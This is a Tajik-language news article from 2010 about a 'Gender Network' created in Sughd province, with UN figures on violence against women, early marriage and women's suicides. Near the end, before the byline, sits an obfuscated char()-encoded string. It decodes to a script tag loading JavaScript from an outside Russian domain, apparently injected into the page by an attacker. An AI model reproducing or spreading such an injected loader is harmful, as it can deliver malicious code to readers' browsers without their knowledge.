16.06.2010
Шабакаи гендерӣ – дифоъ аз ҳуқуқи бонувон
Дар шимоли Тоҷикистон бо ҳадафи баланд бардоштани ҳуқуқи занон ва дар фаъолияти корӣ риоя шудани баробарии гендерӣ дар назди Кумитаи кор бо занон ва оилаи ҳукумати вилояти Суғд «Шабакаи гендерӣ» ташкил гардидааст. Аммо ин ниҳоди навтаъсис то куҷо барои коҳиши ҳуқуқи бонувон дар минтақа муосоидат хоҳад кард, вақт нишон медиҳад.
Масъулини Кумитаи кор бо занон ва оилаи ҳукумати вилояти Суғд иттилоъ медиҳад, ки ба хотири татбиқи қонуни Ҷумҳурии Тоҷикистон дар бобати баробарҳуқуқии мардону занон ва имкониятҳои баробарии онҳо «Шабакаи гендерӣ» ташкил карда шуд. Гуфта мешавад, ки дар ҳоли ҳозир барои фаҳмонидани моҳияти қонуни мазкур, ин шабака давоми чанд рӯзи охир байни аъзоён ва кормандони сохторҳои марбутаи давлатӣ машварати дастурдиҳӣ дар вилояти Суғд ҳамоно идома дорад. Аммо ин дар ҳолест, ки дар нишасти 11-уми худ Шӯрои Ҳуқуқи Башари Созмони Миллали Муттаҳид дар шаҳри Женева вазъи занони тоҷик ва хушунату зӯроварӣ алайҳи онҳо баррасӣ намуда, таъкид дошта буд, ки хушунат алайҳи занон дар Тоҷикистон афзоиш ёфтааст. Он замон зикр гардида буд, ки ҳарчанд қонунҳои Тоҷикистон баробарии ҳуқуқи зану мардро кафолат медиҳад, аммо дар чанд соли охир дар Тоҷикистон риояи ҳуқуқи занон нисбатан коҳиш ёфтааст. Хабаргузориҳо аз қавли гузоришгарони СММ навишта буданд, ки дар Тоҷикистон хушунат алайҳи занон дар хонавода ба як рафтори маъмулӣ пазируфта шудаанд.
СММ дар гузориши худ, ҳамчунин таъкид намуда буд, ки ҳудудан аз 30 то 50 дарсади занони Тоҷикистон мавриди хушунат қарор мегиранд. Ба таъкиди ин созмон, то ин замон издивоҷи бармаҳал дар ҳоли афзоиш буда, тақрибан 40%-и духтарони синфҳои болоӣ дар деҳот бо сабабҳои гуногун тарки макотиб кардаанд.
Дар ҳамин ҳол, аксари бонувони Суғд аз таъсис ёфтани ҳамчунин, як шабакаи гендерӣ дар ин вилоят истиқбол мекунанд ва мегӯянд, ки таъсиси он ба манфиати кор хоҳад буд ва масъулини кумита барои коҳиш додани нақзи ҳуқуқи занон боз ҳам бештар мусоидат хоҳанд кард. Вале ниҳодҳои марбутаи ин вилоят мегӯянд, ки дар Суғд 38 нафар зан ба омилҳои гуногун худкушӣ кардаанд ва бино ба таъкиди бархе аксарият дар натиҷаи муноқишаи оилавӣ худкушӣ намудаанд. Аммо шабакаи гендерӣ барои ҳимоя аз ҳуқуқи занону духтарон то куҷо муваффақ хоҳад шуд, аксари коршиносон назарҳои мухталиф доранд ва бархе аз онҳо мегӯянд, ки амалкарди онро гузашти вақт собит хоҳад намуд.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)04b6cda6f816898d019d29a4ff3a76f5.js" type="text/javascript">

Ҷамшед МАЪРУФ